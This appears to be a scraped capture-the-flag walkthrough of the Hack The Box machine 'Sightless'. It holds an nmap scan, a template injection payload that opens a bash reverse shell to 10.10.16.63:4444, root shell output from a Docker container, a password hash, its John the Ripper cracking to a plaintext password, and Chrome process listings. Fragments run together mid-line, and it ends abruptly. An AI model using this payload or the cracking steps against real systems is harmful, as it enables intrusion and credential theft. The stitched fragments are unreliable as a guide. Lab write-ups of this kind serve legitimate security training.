Sightless

Port scan
Subdomain/vHost
Web vuln (RCE - Template injection)

User shell
Root shell






Last updated








Last updated
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-08 07:24 IST
Nmap scan report for sightless.htb (10.129.93.120)
Host is up (0.20s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp
| fingerprint-strings:
| GenericLines:
| 220 ProFTPD Server (sightless.htb FTP Server) [::ffff:10.129.93.120]
| Invalid command: try being more creative
|_ Invalid command: try being more creative
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 c9:6e:3b:8f:c6:03:29:05:e5:a0:ca:00:90:c9:5c:52 (ECDSA)
|_ 256 9b:de:3a:27:77:3b:1b:e1:19:5f:16:11:be:70:e0:56 (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-title: Sightless.htb
|_http-server-header: nginx/1.18.0 (Ubuntu)
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port21-TCP:V=7.94SVN%I=7%D=9/8%Time=66DD03EF%P=x86_64-pc-linux-gnu%r(Ge
SF:nericLines,A2,"220\x20ProFTPD\x20Server\x20\(sightless\.htb\x20FTP\x20S
SF:erver\)\x20\[::ffff:10\.129\.93\.120\]\r\n500\x20Invalid\x20command:\x2
SF:0try\x20being\x20more\x20creative\r\n500\x20Invalid\x20command:\x20try\
SF:x20being\x20more\x20creative\r\n");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 73.44 seconds{{ process.mainModule.require( 'child_process' ). exec ( 'bash -c "bash -i >& /dev/tcp/10.10.16.63/4444 0>&1"' ) }} root@c184118df0a6:/var/lib/sqlpad# id
id
uid=0(root) gid=0(root) groups=0(root)root@c184118df0a6:/var/lib/sqlpad# ls -la /
ls -la /
total 92
drwxr-xr-x 1 root root 4096 Sep 12 17:15 .
drwxr-xr-x 1 root root 4096 Sep 12 17:15 ..
-rwxr-xr-x 1 root root 0 Aug 2 09:30 .dockerenv
drwxr-xr-x 2 root root 4096 Feb 28 2022 bin
drwxr-xr-x 2 root root 4096 Oct 3 2021 boot
drwxr-xr-x 5 root root 340 Sep 12 15:59 dev
-rwxr-xr-x 1 root root 413 Mar 12 2022 docker-entrypointmichael:$6$mG3Cp2VPGY.FDE8u$KVWVIHzqTzhOSYkzJIpFc2EsgmqvPa.q2Z9bLUU6tlBWaEwuxCDEP9UFHIXNUcF2rBnsaFYuJa6DUh/pL2IJD/:19860:0:99999:7:::╰─➤ john --wordlist=/usr/share/wordlists/rockyou.txt user.micheal.hash
Warning: detected hash type "sha512crypt", but the string is also recognized as "HMAC-SHA256"
Use the "--format=HMAC-SHA256" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 16 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
insaneclownposse (michael)
1g 0:00:00:06 DONE (2024-09-12 23:10) 0.1562g/s 9280p/s 9280c/s 9280C/s Whitney..062699
Use the "--show" option to display all of the cracked passwords reliably
Session completed. michael@sightless:~$ id
uid=1000(michael) gid=1000(michael) groups=1000(michael)/opt/google/chrome/chrome --allow-pre-commit-input --disable-background-networking --disable-client-side-phishing-detection --disable-default-apps --disable-dev-shm-usage --disable-hang-monitor --disable-popup-blocking --disable-prompt-on-repost --disable-sync --enable-automation --enable-logging --headless --log-level=0 --no-first-run --no-sandbox --no-service-autorun --password-store=basic --remote-debugging-port=0 --test-type=webdriver --use-mock-keychain --user-data-dir=/tmp/.org.chromium.Chromium.GAeyhA data:,
/opt/google/chrome/chrome --type=renderer --headless --crashpad-handler-pid=1730 --no-sandbox --disable-dev-shm-usage --enable-automation --remote-debugging-port=0 --test-type=webdriver --allow-pre-commit-input --ozone-platform=headless --disable-gpu-compositing --lang=en-US --num-raster-threads=1 --renderer-client-id=5 --time-ticks-at-unix-epoch=-1726286845035690 --launcPHP-FPM, or “PHP FastCGI Process Manager,” is an advanced,
high-performance FastCGI process manager for PHP.
It resolves the concurrency issue of PHP's built-in server by spawning multiple workers,
which can handle multiple requests simultaneously